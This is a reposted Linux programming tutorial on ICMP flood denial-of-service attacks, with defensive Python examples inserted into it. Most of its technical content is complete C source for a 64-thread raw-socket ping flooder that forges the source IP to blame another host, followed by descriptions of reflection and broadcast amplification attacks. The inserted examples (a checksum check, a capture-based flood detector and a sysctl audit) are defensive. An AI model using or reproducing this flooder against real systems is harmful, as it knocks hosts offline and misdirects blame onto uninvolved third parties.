ICMP flood attacks on Linux programming

Source: Internet
Author: User
Tags: reflection, htons

In my previous article, "Linux Programming: Ping Implementation", I used the ICMP protocol to implement a ping program. Apart from ping, what else can ICMP be used for that is less well known, or more fun? Here I introduce another famous piece of ICMP "black magic": the ICMP flood attack. The ICMP flood is one of the best-known DoS (denial of service) attacks and one that attackers like to use; the purpose here is to deepen our understanding of ICMP and, along the way, to write a small ICMP flood program on top of it. A flood attack uses computer networking to send a large number of useless packets to a destination host, so that the host is kept busy processing them and cannot provide normal service. An ICMP flood, as the name implies, sends a flood of ping packets to the destination host, so that it is kept busy with the pings and has no capacity left for other, legitimate requests: a flood of ping packets drowning the destination host. Implementing an ICMP flood attack requires three pieces of background knowledge:
    • DoS attack principles
    • A thorough understanding of ICMP
    • Raw socket programming

I. Principle of the ICMP flood attack

The ICMP flood attack is built on ping, but the ping program itself can rarely bring the destination host down, because it sends packets far too slowly: the ping program I implemented sends one packet per second, a rate any host can handle with ease. To create a "flood", the packet rate has to be increased. There are three kinds of ICMP flood attack:

(1) Direct flood attack. This is a contest between the bandwidth of the attacking host and the bandwidth of the destination host: if my host has 30M of bandwidth and yours has only 3M, a flood launched from my side has a high chance of overwhelming your host. This mode requires the attacking host to have more processing power and bandwidth than the host being attacked, otherwise it is the attacker who ends up denied service. Following this idea, a high-bandwidth, high-performance machine can send many ICMP echo requests at once from multiple threads, so that the destination host slows down or even goes down while handling the mass of packets. The big drawback of this method is that the other side can read the source IP address of the ICMP packets and block the attack source, after which the attack cannot continue.

(2) Spoofed-IP attack. On top of the direct flood, the source IP address of the packets we send is disguised as some other IP. Disguising it as a random IP hides the attacker's location well; disguising it as the IP of another victim sets the two victims against each other: the echo replies from host 1 also flood victim host 2, and if host 1's administrator tries to find out who is attacking him and looks at the source address of the ICMP packets, he sees host 2, and host 2 becomes the scapegoat.

(3) Reflection attack. This differs from the two attacks above and is more ingenious in design. Mode three is in fact a combination and upgrade of the first two: the reflection attack no longer targets the destination host directly, but instead tricks a group of other hosts by sending them ICMP echo requests; that group then sends ICMP echo replies to the destination host, and the flood arriving from all directions overwhelms it. For example, we send ICMP echo requests to the other hosts on the LAN with our source IP address disguised as the IP of the destination host, so that the destination host becomes the target of all the ICMP echo replies. This kind of attack is very covert, because the victim host has great difficulty finding out who the real attack source is.

II. Design of the ICMP flood attack

Here I implement an example of an ICMP flood attack using the second method. Although the third method is more ingenious, it is only a further extension of the spoofing used in the second, and the implementation is similar. First, the model diagram of the attack is given:

1. Build the ICMP packet

Building the packet here is not much different from building it in the ping program; the only thing to note is that we must fill in the IP header ourselves, because we want to disguise the source address and shift the blame onto someone else.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <pthread.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

/* The globals and constants used below are not shown on the original page;
   the declarations and values here are assumed. */
#define ICMP_PACKET_SIZE 64      /* assumed: IP header (20) + ICMP header (8) + zero padding */
#define THREAD_MAX_NUM   64      /* 64 sending threads, as described in section 4 */
#define PROTO_NAME       "icmp"

static volatile sig_atomic_t alive;   /* sending runs while non-zero; cleared by the signal handler */
static int rawsock;
static int proto_icmp;
static in_addr_t dest;                /* destination host, set from argv[1] */
static const char *fake_ip = "172.0.5.182";   /* disguised source address used in the experiment */

void dos_icmp_pack(char *packet)
{
    struct ip   *ip_hdr   = (struct ip *)packet;
    struct icmp *icmp_hdr = (struct icmp *)(packet + sizeof(struct ip));

    ip_hdr->ip_v   = 4;
    ip_hdr->ip_hl  = 5;
    ip_hdr->ip_tos = 0;
    ip_hdr->ip_len = htons(ICMP_PACKET_SIZE);
    ip_hdr->ip_id  = htons(getpid());
    ip_hdr->ip_off = 0;
    ip_hdr->ip_ttl = 64;             /* the TTL value was lost in extraction; 64 assumed */
    ip_hdr->ip_p   = proto_icmp;
    ip_hdr->ip_sum = 0;              /* with IP_HDRINCL the kernel fills in the IP checksum */
    ip_hdr->ip_src.s_addr = inet_addr(fake_ip);   /* disguised source address */
    ip_hdr->ip_dst.s_addr = dest;                 /* address of the destination host to attack */

    icmp_hdr->icmp_type = ICMP_ECHO;
    icmp_hdr->icmp_code = 0;
    /* Note: because every other ICMP field and the data section are zero, the
       checksum reduces to the one's complement of the type/code word. */
    icmp_hdr->icmp_cksum = htons(~(ICMP_ECHO << 8) & 0xffff);
}
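The checksum shortcut deserves a check. This added example (not from the original article, and in Python rather than the article's C) computes the general RFC 1071 checksum over an echo request and shows that the shortcut matches it only while the identifier, sequence number and payload are all zero.

```python
import struct

ICMP_ECHO = 8   # ICMP type of an echo request


def inet_checksum(data: bytes) -> int:
    """RFC 1071 checksum: one's-complement sum of 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold the carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def icmp_echo_packet(ident: int, seq: int, payload: bytes = b"") -> bytes:
    """Echo request (type 8, code 0) with the checksum computed the general way."""
    raw = struct.pack("!BBHHH", ICMP_ECHO, 0, 0, ident, seq) + payload
    return struct.pack("!BBHHH", ICMP_ECHO, 0, inet_checksum(raw), ident, seq) + payload


def shortcut_checksum() -> int:
    """The article's shortcut: complement of the type/code word only."""
    return (~(ICMP_ECHO << 8)) & 0xFFFF


def shortcut_is_valid(ident: int, seq: int, payload: bytes = b"") -> bool:
    """True when the shortcut equals the general checksum for this packet."""
    general = struct.unpack("!H", icmp_echo_packet(ident, seq, payload)[2:4])[0]
    return general == shortcut_checksum()
```

A receiver verifies a packet by summing it checksum included; a correct packet sums to zero, which is why the article's all-zero packet passes with the shortcut.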

2. Build the sending thread

void *dos_attack(void *arg)
{
    char *packet = (char *)malloc(ICMP_PACKET_SIZE);
    struct sockaddr_in to;

    (void)arg;
    memset(packet, 0, ICMP_PACKET_SIZE);
    dos_icmp_pack(packet);

    to.sin_family      = AF_INET;
    to.sin_addr.s_addr = dest;
    to.sin_port        = htons(0);

    while (alive) {   /* global switch that controls sending */
        sendto(rawsock, packet, ICMP_PACKET_SIZE, 0,
               (struct sockaddr *)&to, sizeof(struct sockaddr));
    }
    free(packet);     /* remember to release the memory */
    return NULL;
}

3. Write the sending switch

The switch here is simple: a signal handler plus a global variable. When we press Ctrl+C, the attack stops.

void dos_sig(int sig)
{
    (void)sig;
    alive = 0;
    printf("stop DoS attack!\n");
}

4. Overall structure

We use 64 threads to send packets; the number of threads can of course be raised much further to strengthen the attack, but since this is only an experiment there is no need to go that high.

int main(int argc, char *argv[])
{
    struct hostent  *host     = NULL;
    struct protoent *protocol = NULL;
    pthread_t attack_thread[THREAD_MAX_NUM];   /* 64 threads sending at the same time */
    int i, err = 0, on = 1;

    alive = 1;
    if (argc < 2) {
        printf("Invalid input!\n");
        return -1;
    }
    signal(SIGINT, dos_sig);

    protocol = getprotobyname(PROTO_NAME);
    if (protocol == NULL) {
        printf("Fail to getprotobyname!\n");
        return -1;
    }
    proto_icmp = protocol->p_proto;

    dest = inet_addr(argv[1]);
    if (dest == INADDR_NONE) {
        host = gethostbyname(argv[1]);
        if (host == NULL) {
            printf("Invalid IP or Domain name!\n");
            return -1;
        }
        memcpy((char *)&dest, host->h_addr, host->h_length);
    }

    rawsock = socket(AF_INET, SOCK_RAW, proto_icmp);
    if (rawsock < 0) {
        printf("Fail to create socket!\n");
        return -1;
    }
    /* we supply the IP header ourselves; IP_HDRINCL takes an int (the page passed the string "1") */
    setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));
    printf("ICMP FLOOD ATTACK start\n");

    for (i = 0; i < THREAD_MAX_NUM; i++) {
        err = pthread_create(&attack_thread[i], NULL, dos_attack, NULL);
        if (err)
            printf("Fail to create thread %d, err %d\n", i, err);
    }
    for (i = 0; i < THREAD_MAX_NUM; i++)
        pthread_join(attack_thread[i], NULL);   /* wait for the threads to end */

    printf("ICMP ATTACK finish!\n");
    close(rawsock);
    return 0;
}

III. The experiment

The experiment was done for learning purposes, on my own equipment, in order to understand the network and the protocol better; the scale of the attack was therefore small, it lasted only a few seconds, and no device was affected. The attack steps: host 172.0.5.183 is our attacking host, we disguise ourselves as host 172.0.5.182, and we launch an ICMP flood against host 172.0.5.9. Once the attack begins, look at the situation on the "victim" side: in just 5 seconds, more than 70,000 packets were received and delivered to the upper layer. I did not dare run it longer, to avoid affecting the machine's work. Capturing with Wireshark shows nothing but ICMP packets, and the volume is clearly large. The source address of the ICMP packets shows as 172.0.5.182 (our spoofed address), and the victim sends its echo replies back to 172.0.5.182. Host 172.0.5.182 must be wondering why it is inexplicably receiving so many echo reply packets.

That completes the attack experiment. DDoS attacks are more popular today; they are more powerful, more sophisticated, and harder to defend against. A DDoS attack of this kind is in fact launched on the basis of the DoS described above, in the following steps:

1. The attacker broadcasts an echo request to the "amplifier network".
2. The attacker sets the source IP of the broadcast packet to the IP of the attacked host.
3. The "amplifier network" sends echo replies to the attacked host.

(Figure: DDoS attack scenario)

Here the "amplifier network" can be understood as a network containing many hosts whose operating systems respond to ICMP requests whose destination address is the broadcast address. The attack strategy is subtle; in short, disguise the source address as the IP of the attacked host, then broadcast to all the hosts: after receiving the echo request they all reply to the attacked host at once, and it becomes the target of everyone's fire.
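From the defender's side, the two symptoms described in the experiment (a burst of identical echo requests arriving at the victim, and echo replies arriving at 172.0.5.182 for pings it never sent) are easy to spot in a capture. This added example (not part of the article) runs a small detector over constructed tcpdump-style lines that model the experiment; the addresses follow the text, while the packet counts and timestamps are assumptions.

```python
import re
from collections import Counter

# Real `tcpdump -n icmp` line format; the capture text below is constructed.
LINE_RE = re.compile(r"^(\d\d):(\d\d):(\d\d)\.\d+ IP (\S+) > (\S+): ICMP echo (request|reply), "
                     r"id (\d+), seq (\d+)")

def _lines(src, dst, kind, per_sec):
    # per_sec packets a second for 5 seconds, all id 0 / seq 0 like the flood's packets
    return [f"12:00:0{s}.{i:06d} IP {src} > {dst}: ICMP echo {kind}, id 0, seq 0, length 64"
            for s in range(5) for i in range(per_sec)]

# Capture taken on the victim 172.0.5.9: spoofed requests arrive, replies leave.
VICTIM_CAPTURE = "\n".join(
    ln for pair in zip(_lines("172.0.5.182", "172.0.5.9", "request", 30),
                       _lines("172.0.5.9", "172.0.5.182", "reply", 30)) for ln in pair)
# Capture taken on the impersonated host 172.0.5.182: only replies show up.
SPOOFED_HOST_CAPTURE = "\n".join(_lines("172.0.5.9", "172.0.5.182", "reply", 30))

def parse(capture):
    for line in capture.splitlines():
        m = LINE_RE.match(line)
        if m:
            h, mi, s, src, dst, kind, ident, seq = m.groups()
            yield int(h) * 3600 + int(mi) * 60 + int(s), src, dst, kind, (int(ident), int(seq))

def analyse(capture, rate_threshold=20):
    """Return (hosts flooded above rate_threshold requests/s, unsolicited replies per host)."""
    req_per_sec = Counter()   # (dst, second) -> echo requests received
    pending = Counter()       # (requester, target, id, seq) -> requests not yet answered
    unsolicited = Counter()   # host -> echo replies it never asked for
    for sec, src, dst, kind, key in parse(capture):
        if kind == "request":
            req_per_sec[(dst, sec)] += 1
            pending[(src, dst) + key] += 1
        elif pending[(dst, src) + key] > 0:   # reply matches a request dst sent to src
            pending[(dst, src) + key] -= 1
        else:
            unsolicited[dst] += 1
    flooded = sorted({dst for (dst, _), n in req_per_sec.items() if n >= rate_threshold})
    return flooded, dict(unsolicited)
```

The threshold is deliberately low for the constructed data; on a real host it should sit well above the normal echo-request rate the host sees.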
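The broadcast amplification described above depends on hosts that answer pings sent to the broadcast address, which Linux controls with a few net.ipv4 sysctls. This added example (not from the article) audits those settings over constructed sysctl output; the sysctl keys are real, and the "hardened" values are this example's assumption of a reasonable baseline.

```python
# Real Linux sysctl keys (see ip-sysctl.txt); both outputs below are constructed.
WEAK_SYSCTL = """\
net.ipv4.icmp_echo_ignore_broadcasts = 0
net.ipv4.icmp_ratelimit = 0
net.ipv4.icmp_ratemask = 6168
net.ipv4.conf.all.rp_filter = 0
"""
HARDENED_SYSCTL = """\
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.icmp_ratelimit = 1000
net.ipv4.icmp_ratemask = 6169
net.ipv4.conf.all.rp_filter = 1
"""
ECHO_REPLY_BIT = 1 << 0   # bit for ICMP type 0 (echo reply) in icmp_ratemask

def parse_sysctl(text):
    """Turn `sysctl net.ipv4`-style 'key = value' lines into a dict."""
    pairs = (ln.split("=", 1) for ln in text.splitlines() if "=" in ln)
    return {k.strip(): v.strip() for k, v in pairs}

def audit_icmp(s):
    """List (key, current value, why it matters); an empty list means hardened."""
    findings = []
    if s.get("net.ipv4.icmp_echo_ignore_broadcasts") != "1":
        findings.append(("net.ipv4.icmp_echo_ignore_broadcasts",
                         s.get("net.ipv4.icmp_echo_ignore_broadcasts"),
                         "answers pings sent to the broadcast address, so the host can act as an amplifier"))
    if s.get("net.ipv4.icmp_ratelimit", "0") == "0":
        findings.append(("net.ipv4.icmp_ratelimit", "0", "ICMP rate limiting is disabled"))
    mask = int(s.get("net.ipv4.icmp_ratemask", "0"))
    if not mask & ECHO_REPLY_BIT:
        findings.append(("net.ipv4.icmp_ratemask", str(mask),
                         "echo replies (type 0) are not in the rate-limited set"))
    if s.get("net.ipv4.conf.all.rp_filter", "0") == "0":
        findings.append(("net.ipv4.conf.all.rp_filter", "0",
                         "no reverse-path check; on a gateway, spoofed sources from other subnets are not dropped"))
    return findings
```

On a live host, feed parse_sysctl() the stdout of `sysctl net.ipv4`; rate limiting and rp_filter reduce the damage of the spoofed flood but do not stop it, so the detector-side view still matters.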
